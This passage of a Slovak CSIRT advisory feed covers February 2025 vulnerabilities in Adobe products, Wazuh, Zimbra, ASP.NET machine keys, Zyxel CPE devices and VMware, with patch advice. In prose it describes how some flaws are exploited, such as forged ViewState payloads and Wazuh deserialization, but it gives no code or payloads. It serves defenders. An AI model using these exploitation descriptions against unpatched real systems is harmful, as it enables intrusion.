<li>Adobe Commerce 2.4.4 vo verziách starších ako 2.4.4-p12</li>



<li>Adobe Commerce 1.5.1 vo verziách starších ako 1.5.1</li>



<li>Adobe Commerce B2B 1.4.2 vo verziách starších ako 1.4.2-p4</li>



<li>Adobe Commerce B2B 1.3.5 vo verziách starších ako 1.3.5-p9</li>



<li>Adobe Commerce B2B 1.3.4 vo verziách starších ako 1.3.4-p11</li>



<li>Adobe Commerce B2B 1.3.3 vo verziách starších ako 1.3.3-p12</li>



<li>Magento Open Source&nbsp; 2.4.8 vo verziách starších ako 2.4.8-beta2</li>



<li>Magento Open Source&nbsp; 2.4.7 vo verziách starších ako 2.4.7-p4</li>



<li>Magento Open Source&nbsp; 2.4.6 vo verziách starších ako 2.4.6-p9</li>



<li>Magento Open Source&nbsp; 2.4.5 vo verziách starších ako 2.4.5-p11</li>



<li>Magento Open Source&nbsp; 2.4.4 vo verziách starších ako 2.4.4-p12</li>



<li>Adobe Commerce and Magento Open Source bez aplikovanej záplaty pre CVE-2025-24434</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Adobe InDesign:</u></strong></p>



<p><strong>CVE-2025-21157, CVE-2025-21158, CVE-2025-21121,&nbsp; CVE-2025-21123 </strong>(CVSS skóre 7,8)</p>



<p>Kritické zraniteľnosti v&nbsp;produkte Adobe InDesign spočívajú v&nbsp;podtečení celočíselnej premennej (CVE-2025-21158), zápise mimo povolené hodnoty (CVE-2025-21157, CVE-2025-21121) a&nbsp;pretečení medzipamäte haldy (CVE-2025-21123). Podvrhnutím špeciálne vytvorených súborov ich možno zneužiť na <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Adobe InCopy:</u></strong></p>



<p><strong>CVE-2025-21156 </strong>(CVSS skóre 7,8)</p>



<p>Podtečenie celočíselnej premennej možno zneužiť na <strong>vzdialené vykonanie kódu</strong> s následkom úplného narušenia dôvernosti, integrity a&nbsp;dostupnosti systému.</p>



<p><strong><u>Adobe Illustrator:</u></strong></p>



<p><strong>CVE-2025-21159, CVE-2025-21160, CVE-2025-21163 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v podtečení celočíselnej premennej (CVE-2025-21160), použití odalokovaného miesta v&nbsp;pamäti (CVE-2025-21159) a pretečení vyrovnávacej pamäte zásobníka (CVE-2025-21163) možno zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong><u>Adobe Substance 3D Designer:</u></strong></p>



<p><strong>CVE-2025-21161 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť s&nbsp;označením CVE-2025-21161 možno prostredníctvom zápisu mimo povolených hodnôt zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong><u>Adobe Commerce:</u></strong></p>



<p><strong>CVE-2025-24408 </strong>(CVSS skóre 8,1); <strong>CVE-2025-24406</strong> (CVSS skóre 7,5)</p>



<p>Uvedené zraniteľnosti možno prostredníctvom tzv. path traversal útokov a&nbsp;na základe verejne dostupných informácií systému zneužiť na <strong>eskaláciu privilégií</strong>. <strong>Zneužitie uvedených zraniteľností nevyžaduje interakciu zo strany používateľa.</strong></p>



<p><strong>CVE-2025-24434 </strong>(CVSS skóre 9,4); <strong>CVE-2025-24409</strong> (CVSS skóre 8,2); <strong>CVE-2025-24407</strong> (CVSS skóre 7,1);</p>



<p>Bližšie nešpecifikované zraniteľnosti spočívajúce v&nbsp;nesprávnej autorizácii možno zneužiť na <strong>eskaláciu privilégií</strong> (CVE-2025-24434) a <strong>obídenie bezpečnostných prvkov </strong>(CVE-2025-24409, CVE-2025-24407). <strong>Zneužitie uvedených zraniteľností nevyžaduje interakciu zo strany používateľa.</strong></p>



<p><strong>CVE-2025-24411 </strong>(CVSS skóre 8,8)</p>



<p>Nesprávne riadenie prístupov možno zneužiť na <strong>obídenie bezpečnostných prvkov</strong> a&nbsp;úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému. <strong>Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</strong></p>



<p><strong>CVE-2025-24417, CVE-2025-24416, CVE-2025-24415, CVE-2025-24414, CVE-2025-24413, CVE-2025-24412 </strong>(CVSS skóre 8,9); <strong>CVE-2025-24438, CVE-2025-24410</strong> (CVSS skóre 8,7)</p>



<p>Predmetné zraniteľnosti možno zneužiť na <strong>realizáciu perzistentných XSS útokov (stored cross-site scripting)</strong>.</p>



<p><strong><u>Ostatné zraniteľnosti:</u></strong></p>



<p>Zneužitím ostatných vysoko závažných zraniteľností možno získať neoprávnený prístup k&nbsp;citlivým údajom, eskaláciu privilégií a&nbsp;spôsobiť zneprístupnenie služby.</p>



<p>Ak nie je uvedené inak, zneužitie vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované v&nbsp;časti Zraniteľné systémy alebo&nbsp;na webových stránkach výrobcu uvedených v&nbsp;časti Zdroje. Zároveň odporúčame poučiť používateľov, aby neotvárali správy a&nbsp;prílohy z&nbsp;neznámych a&nbsp;nedôveryhodných zdrojov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/indesign/apsb25-01.html">https://helpx.adobe.com/security/products/indesign/apsb25-01.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/magento/apsb25-08.html">https://helpx.adobe.com/security/products/magento/apsb25-08.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d_stager/apsb25-09.html">https://helpx.adobe.com/security/products/substance3d_stager/apsb25-09.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/incopy/apsb25-10.html">https://helpx.adobe.com/security/products/incopy/apsb25-10.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/illustrator/apsb25-11.html">https://helpx.adobe.com/security/products/illustrator/apsb25-11.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d_designer/apsb25-12.html">https://helpx.adobe.com/security/products/substance3d_designer/apsb25-12.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/photoshop_elements/apsb25-13.html">https://helpx.adobe.com/security/products/photoshop_elements/apsb25-13.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2035/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností január 2025</title>
		<link>/posts/2029</link>
					<comments>/posts/2029#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 17 Feb 2025 14:31:45 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2029</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci január 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci január 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/02/2025_01_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 01/2025 PDF (564 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2029/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Wazuh umožňuje vykonávať kód</title>
		<link>/posts/2016</link>
					<comments>/posts/2016#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 15:44:22 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Wazuh]]></category>
		<guid isPermaLink="false">/?p=2016</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/wazuh.jpg" alt="" /></p>Vývojári open-source SIEM a XDR platformy Wazuh vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. Táto umožňuje vzdialene vykonávať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/wazuh.jpg" alt="" /></p>
<p><strong>Vývojári open-source SIEM a XDR platformy Wazuh vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. Táto umožňuje vzdialene vykonávať kód Python. Na uvedenú zraniteľnosť je dostupný proof-of-concept kód demonštrujúci postup jej zneužitia.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Wazuh 4.4.0 až 4.9.0</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-24016</strong> (CVSS skóre 9,9)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;nezabezpečenej deserializácii objektov a umožňuje vzdialené vykonávanie kódu písaného v&nbsp;jazyku Python na zraniteľných serveroch Wazuh. Útočník môže zneužiť komponent <em>DistributedAPI (DAPI)</em> injektovaním dát do API požiadavky alebo odpovede. V&nbsp;určitých konfiguráciách môže na útok zneužiť kompromitovaného agenta.</p>



<p>Chyba sa nachádza v deserializačnej funkcii <em>as_wazuh_object</em> a podvrhnutím vhodne upravenej premennej typu <em>dictinary</em> do DAPI požiadavky alebo odpovede môže útočník vyvolať neošetrenú výnimku, čo povedie k vykonaniu ľubovoľného kódu v jazyku Python.</p>



<p>Na uvedenú zraniteľnosť je dostupný proof-of-concept kód demonštrujúci postup jej zneužitia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Wazuh aspoň na verziu 4.9.1.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh">https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh</a></li>



<li><a href="https://securityvulnerability.io/vulnerability/CVE-2025-24016">https://securityvulnerability.io/vulnerability/CVE-2025-24016</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2016/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti Zimbra Collaboration</title>
		<link>/posts/2012</link>
					<comments>/posts/2012#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 15:40:46 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Zimbra]]></category>
		<guid isPermaLink="false">/?p=2012</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/zimbra.png" alt="" /></p>V produkte Zimbra Collaboration boli opravené dve kritické a&#160;jedna stredne závažná zraniteľnosť. Tieto umožňujú útočníkom získať metadáta e-mailov alebo presmerovanie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/zimbra.png" alt="" /></p>
<p><strong>V produkte Zimbra Collaboration boli opravené dve kritické a&nbsp;jedna stredne závažná zraniteľnosť. Tieto umožňujú útočníkom získať metadáta e-mailov alebo presmerovanie na koncové body v rámci vnútornej siete.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zimbra Collaboration staršie ako 10.0.12 a&nbsp;10.1.4</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-25064</strong><strong> (CVSS skóre 9,8)</strong></p>



<p>Kritická zraniteľnosť v ZimbraSync Service SOAP súvisí s nedostatočnou sanitizáciou používateľských vstupov v nešpecifikovanom parametri. Umožňuje vykonávať útoky typu SQL injection a získať metadáta e-mailov.</p>



<p><strong>CVE-2025-25065</strong><strong> (CVSS skóre 5,3)</strong></p>



<p>V parsovacom nástroji RSS sa nachádza zraniteľnosť umožňujúca útoky typu SSRF a presmerovanie na koncové body vo vnútornej sieti.</p>



<p>Okrem toho Zimbra opravila kritickú zraniteľnosť v Classic Web Client, ktorá umožňuje vykonanie perzistentného XSS útoku. Zraniteľnosť je zatiaľ bez onačenia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Zimbra Collaboration na verziu 9.0.0 Patch 44, 10.0.13, alebo 10.1.5.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://thehackernews.com/2025/02/zimbra-releases-security-updates-for.html">https://thehackernews.com/2025/02/zimbra-releases-security-updates-for.html</a></li>



<li><a href="https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories">https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2012/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Útočníci aktívne zneužívajú verejne dostupné ASP.NET kľúče na vzdialené vykonanie kódu</title>
		<link>/posts/2009</link>
					<comments>/posts/2009#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 13:57:10 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ASP.NET]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2009</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/ASP.NET_-1024x634.png" alt="" /></p>Spoločnosť Microsoft varovala pred útokmi na aplikácie ASP.NET, v rámci ktorých útočníci na vzdialené vykonanie kódu a šírenie malvéru zneužívajú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/ASP.NET_-1024x634.png" alt="" /></p>
<p><strong>Spoločnosť Microsoft varovala pred útokmi na aplikácie ASP.NET, v rámci ktorých útočníci na vzdialené vykonanie kódu a šírenie malvéru zneužívajú verejne dostupné statické strojové kľúče (machine keys) ASP.NET</strong><strong>.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>ASP.NET aplikácie s&nbsp;verejne dostupnými kľúčmi</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>Mnohí vývojári nedodržiavaním pravidiel bezpečného vývoja v rámci aplikácií využívajú </strong><strong><em>validationKey</em></strong><strong> a </strong><strong><em>decryptionKey</em></strong><strong>, ktoré je možné nájsť vo verejne dostupných zdrojoch ako sú napr. dokumentácia alebo repozitáre zdrojového kódu.</strong></p>



<p>Uvedené kľúče sú navrhnuté na ochranu <em>ViewState</em> používaných v&nbsp;rámci webových formulárov ASP.NET Web Forms na kontrolu stavu a&nbsp;zachovanie stránok. Z&nbsp;pohľadu útočníka ich možno zneužiť na vytvorenie škodlivých payloadov so správnym MAC (Message Authentication Code) slúžiacim na overenie integrity a&nbsp;autenticity správy. Škodlivé ViewState sú prostredníctvom HTTP POST požiadaviek zaslané na IIS servery, kde ASP.NET Runtime vykoná ich dešifrovanie a&nbsp;overenie MAC. Pretože bol kód MAC vytvorený prostredníctvom správnych kľúčov, dochádza k&nbsp;nahratiu payloadu do pamäte a&nbsp;jeho následnému spusteniu.</p>



<p><strong>Spoločnosť Microsoft identifikovala vyše 3 000 uniknutých kľúčov, ktorých hashe za účelom preverenia sprístupnila vo forme </strong><a href="https://github.com/microsoft/mstic/blob/master/RapidReleaseTI/MachineKeys.csv"><strong>CSV súboru</strong></a><strong> na svojom GitHub repozitári. Prítomnosť Vašich kľúčov v&nbsp;tomto zozname môžete skontrolovať prostredníctvom </strong><a href="https://github.com/microsoft/mstic/blob/master/RapidReleaseTI/MachineKeyScan.ps1"><strong>PowerShell skriptu</strong></a><strong>.</strong></p>



<p>Na základe dostupných informácií <strong>útočníci verejne dostupné kľúče zneužívajú minimálne od decembra 2024</strong>, kedy boli zneužité na kompromitáciu systémov post-exploitačným frameworkom Godzilla.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;vývojárom odporúčame overiť či ich aplikácie nepoužívajú verejne dostupné kľúče ASP.NET. <a href="https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/">Kompletný postup</a> môžete nájsť v&nbsp;časti „Recommendations“ na webovej stránke spoločnosti Microsoft.</p>



<p>V&nbsp;rámci preventívnych opatrení spoločnosť odporúča dodržiavať pravidlá bezpečného vývoja softvéru a&nbsp;v&nbsp;súvislosti vývojom aplikácií ASP.NET:</p>



<ul>
<li>Nepoužívať predvolené alebo verejne dostupné kľúče</li>



<li>Šifrovať elementy <em>machineKey</em> a&nbsp;<em>connectionStrings</em> v&nbsp;rámci súborov <em>web.config</em></li>



<li>Aktualizovať ASP.NET framework aspoň na verziu 4.8, ktorá umožňuje využitie funkcie AMSI (Antimalware Scan Interface)</li>



<li>Zabezpečiť (hardenovať) servery Windows s&nbsp;dôrazom na <a href="https://learn.microsoft.com/en-us/defender-endpoint/overview-attack-surface-reduction">minimalizáciu attack surface</a> (verejne dostupné služby a&nbsp;koncové body)</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/">https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/microsoft-says-attackers-use-exposed-aspnet-keys-to-deploy-malware/">https://www.bleepingcomputer.com/news/security/microsoft-says-attackers-use-exposed-aspnet-keys-to-deploy-malware/</a></li>



<li><a href="https://thehackernews.com/2025/02/microsoft-identifies-3000-publicly.html">https://thehackernews.com/2025/02/microsoft-identifies-3000-publicly.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2009/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívané zero-day zraniteľnosti v Zyxel zariadeniach série CPE</title>
		<link>/posts/2004</link>
					<comments>/posts/2004#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 13:53:11 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Zyxel]]></category>
		<guid isPermaLink="false">/?p=2004</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/zyxel-1024x667.jpg" alt="" /></p>Bezpečnostní výskumníci z&#160;Greynoise a&#160;Vulncheck varujú pred aktívnym zneužívaním kritických zero-day zraniteľností v&#160;zariadeniach Zyxel CPE. CVE-2024-40891 a&#160; CVE-2024-40891 možno zneužiť na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/zyxel-1024x667.jpg" alt="" /></p>
<p><strong>Bezpečnostní výskumníci z&nbsp;Greynoise a&nbsp;Vulncheck varujú pred aktívnym zneužívaním kritických zero-day zraniteľností v&nbsp;zariadeniach Zyxel CPE. CVE-2024-40891 a&nbsp; CVE-2024-40891 možno zneužiť na vzdialené vykonanie príkazov a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zariadenia Zyxel série CPE (Customer Premises Equipment): VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, SBG3500</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-40890, CVE-2024-40891 </strong>(CVSS skóre 8,8)</p>



<p>Bližšie nešpecifikované zraniteľnosti by vzdialený autentifikovaný útočník mohol zneužiť na <strong>injekciu príkazov</strong> prostredníctvom servisných účtov „supervisor“ alebo&nbsp;„zyuser“ a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>. Zatiaľ čo zraniteľnosť CVE-2024-40891 je možné zneužiť prostredníctvom protokolu Telnet, CVE-2024-40890 možno zneužiť zaslaním špeciálne vytvorených http POST požiadaviek.</p>



<p><strong>Zraniteľnosti odhalila spoločnosť VulnCheck ešte </strong><a href="https://vulncheck.com/blog/initial-access-intelligence-july-2024"><strong>v júli 2024</strong></a><strong>, ale na základe dostupných informácií stále neboli opravené.</strong></p>



<p><strong>Zraniteľnosť CVE-2024-40891 v&nbsp;súčasnosti aktívne zneužívajú rôzne varianty botnetov založených na báze Mirai.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Uvedené zraniteľnosti spoločnosť Zyxel neopraví, pretože zasiahnuté zariadenia dosiahli tatus end-of-life. Odporúčame preto vymeniť zraniteľné zariadenie za podporované. V&nbsp;prípade, že to nie je možné, odporúčame limitovať prístup k&nbsp;administratívnym rozhraniam zariadení a&nbsp;vykonávať zvýšený monitoring HTTP a&nbsp;TELNET komunikácie.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://vulncheck.com/blog/initial-access-intelligence-july-2024">https://vulncheck.com/blog/initial-access-intelligence-july-2024</a></li>



<li><a href="https://www.greynoise.io/blog/active-exploitation-of-zero-day-zyxel-cpe-vulnerability-cve-2024-40891">https://www.greynoise.io/blog/active-exploitation-of-zero-day-zyxel-cpe-vulnerability-cve-2024-40891</a></li>



<li><a href="https://thehackernews.com/2025/01/zyxel-cpe-devices-face-active.html">https://thehackernews.com/2025/01/zyxel-cpe-devices-face-active.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2004/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažné zraniteľnosti v produktoch VMware AVI Load Balancer, Aria Operations a Cloud Foundation</title>
		<link>/posts/2002</link>
					<comments>/posts/2002#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 13:49:43 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[VMware]]></category>
		<guid isPermaLink="false">/?p=2002</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Spoločnosť Broadcom vydala bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností v produktoch VMware AVI Load Balancer, Aria Operations a&#160;Cloud Foundation, z&#160;ktorých...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>
<p><strong>Spoločnosť Broadcom vydala bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností v produktoch VMware AVI Load Balancer, Aria Operations a&nbsp;Cloud Foundation, z&nbsp;ktorých 4 sú označené ako vysoko závažné. Najzávažnejšie zraniteľnosti možno zneužiť na získanie neoprávneného prístupu k&nbsp;databáze (CVE-2025-22217 &#8211; AVI Load Balancer) a&nbsp;k prihlasovacím údajom produktov VMware integrovaných do Aria Operations for Logs (CVE-2025-22218).</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>VMware AVI Load Balancer 30.1.X vo verziách starších ako 30.1.2-2p2</li>



<li>VMware AVI Load Balancer 30.2.1 vo verziách starších ako 30.2.1-2p5</li>



<li>VMware AVI Load Balancer 30.2.1 vo verziách starších ako 30.2.2-2p2</li>



<li>VMware Aria Operations for Logs 8.x vo verziách starších ako 8.18.3</li>



<li>VMware Aria Operations 8.x vo verziách starších ako 8.18.3</li>



<li>VMware Cloud Foundation 4.x a 5.x bez aplikovanej záplaty KB92148</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>VMware AVI Load Balancer:</u></strong></p>



<p><strong>CVE-2025-22217&nbsp; </strong>(CVSS skóre 8,6)</p>



<p>Zraniteľnosť spočíva v&nbsp;nedostatočnom overovaní používateľských vstupov a&nbsp;vzdialený neautentifikovaný útočník by ju prostredníctvom SQL injekcie mohol zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong> v databáze.</p>



<p><strong><u>VMware Aria Operations for Logs, VMware Cloud Foundation:</u></strong></p>



<p><strong>CVE-2025-22218&nbsp; </strong>(CVSS skóre 8,5)</p>



<p>Zraniteľnosť CVE-2025-22218 by mohol&nbsp;vzdialený autentifikovaný útočník s&nbsp;oprávneniami úrovne „View Only Admin“ zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;prihlasovacích údajom</strong> produktov VMware integrovaných do VMware Aria Operations for Logs.</p>



<p><strong>CVE-2025-22222&nbsp; </strong>(CVSS skóre 7,7)</p>



<p>Zraniteľnosť by vzdialený autentifikovaný útočník bez administrátorských oprávnení mohol zneužiť na <strong>získanie prihlasovacích údajov</strong> pre moduly. Zneužitie zraniteľnosti vyžaduje znalosť platného identifikátora „Service Credential ID“.</p>



<p><strong><u>VMware Aria Operations, VMware Cloud Foundation:</u></strong></p>



<p><strong>CVE-2025-22219&nbsp; </strong>(CVSS skóre 6,8)</p>



<p>Predmetnú zraniteľnosť by vzdialený autentifikovaný útočník mohol zneužiť na realizáciu perzistentných<strong> XSS (Cross Site Scripting) útokov</strong> s&nbsp;následkom <strong>vykonania neoprávnených zmien v&nbsp;systéme</strong>, ktoré vyžadujú administrátorské oprávnenia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik&nbsp;citlivých údajov</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať aktualizáciu zraniteľných systémov aspoň na verzie</p>



<ul>
<li>VMware AVI Load Balancer 30.1.2-2p2, 30.2.1-2p5, alebo 30.2.2-2p2</li>



<li>VMware Aria Operations for Logs 8.18.3</li>



<li>VMware Aria Operations 8.18.3</li>



<li>VMware Cloud Foundation 4.x a 5.x záplata KB92148</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25346">https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25346</a></li>



<li><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25329">https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25329</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2002/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažné zraniteľnosti v PHP balíku Voyager používaného na správu aplikácií Laravel</title>
		<link>/posts/1998</link>
					<comments>/posts/1998#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 13:45:53 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Laravel]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Voyager]]></category>
		<guid isPermaLink="false">/?p=1998</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/voyager-1024x675.png" alt="" /></p>Bezpečnostní výskumníci zo spoločnosti SonarSource zverejnili informácie o 3 bezpečnostných zraniteľnostiach open-source PHP balíka Voyager používaného na správu Laravel aplikácií....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/voyager-1024x675.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zo spoločnosti SonarSource zverejnili informácie o 3 bezpečnostných zraniteľnostiach open-source PHP balíka Voyager používaného na správu Laravel aplikácií. Zreťazením zraniteľností CVE-2024-55417 a CVE-2024-55416 možno dosiahnuť vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PHP balík Voyager vo verziách starších ako 1.8.0 (vrátane)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



